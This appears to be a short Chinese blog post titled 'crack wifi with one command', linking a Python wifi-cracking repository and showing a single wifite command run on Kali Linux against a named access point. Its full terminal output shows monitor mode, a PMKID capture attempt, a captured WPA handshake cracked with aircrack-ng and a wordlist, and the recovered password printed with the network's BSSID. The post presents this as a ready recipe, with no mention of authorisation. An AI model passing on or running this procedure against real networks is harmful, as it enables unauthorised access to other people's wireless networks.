一行命令破解wifi

Python破解wifi

https://github.com/forJrking/PyWifi

一行命令破解wifi

wifite -e CMCC-xHgh  CMCC-xHgh是wifi名
(root?kali)-[/home/kali]
+-# wifite -e CMCC-xHgh                                                                                                  
   .               .    
 .´  ·  .     .  ·  `.  wifite2 2.7.0
 :  :  :  (¯)  :  :  :  a wireless auditor by derv82
 `.  ·  `\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´    https://github.com/kimocoder/wifite2

 [+] option: targeting ESSID CMCC-xHgh
 [!] Conflicting processes: NetworkManager (PID 517), wpa_supplicant (PID 1338)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill                                                                                                                                                                        

    Interface   PHY   Driver              Chipset                                                                                                                                                                                          
-----------------------------------------------------------------------
 1. wlan0       phy1  rt2800usb           Ralink Technology, Corp. RT5370

 [+] Enabling monitor mode on wlan0... enabled!

 [+] Scanning. Found 0 target(s), 0 client(s). Ctrl+C when ready                                                                                                                                                                           


 [+] Scanning. Found 0 target(s), 0 client(s). Ctrl+C when ready                                                                                                                                                                           
 [+] found target 80:B0:7B:2F:C3:28 (CMCC-xHgh)

 [+] (1/1) Starting attacks against 80:B0:7B:2F:C3:28 (CMCC-xHgh)
 [+] CMCC-xHgh (51db) PMKID CAPTURE: Waiting for PMKID (4m29s) 
 [!] Interrupted

 [+] 1 attack(s) remain
 [+] Do you want to continue attacking, or exit (c, e)? c
 [+] CMCC-xHgh (51db) WPA Handshake capture: found existing handshake for CMCC-xHgh                                                                                                                                                        
 [+] Using handshake from hs/handshake_CMCCxHgh_80-B0-7B-2F-C2-20_2024-02-19T10-29-40.cap

 [+] analysis of captured handshake file:
 [+]   tshark: .cap file contains a valid handshake for (80:B0:7B:2F:C3:28)
 [+] aircrack: .cap file contains a valid handshake for (80:B0:7B:2F:C3:28)

 [+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
 [+] Cracking WPA Handshake: 0.00% ETA: 14m52s @ 228.5kps (current key: )                                                                                                                                                                  
 [+] Cracked WPA Handshake PSK: 66666666

 [+]   Access Point Name: CMCC-xHgh
 [+]  Access Point BSSID: 80:B0:7B:2F:C3:28
 [+]          Encryption: WPA
 [+]      Handshake File: hs/handshake_CMCCxHgh_80-B0-7B-2F-C2-20_2024-02-19T10-29-40.cap
 [+]      PSK (password): 密码: 66666666
 [+] CMCC-xHgh already exists in cracked.json, skipping.
 [+] Finished attacking 1 target(s), exiting                                                                                                                                                                                               
 [!] Note: Leaving interface in Monitor Mode!
 [!] To disable Monitor Mode when finished: airmon-ng stop wlan0mon

  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值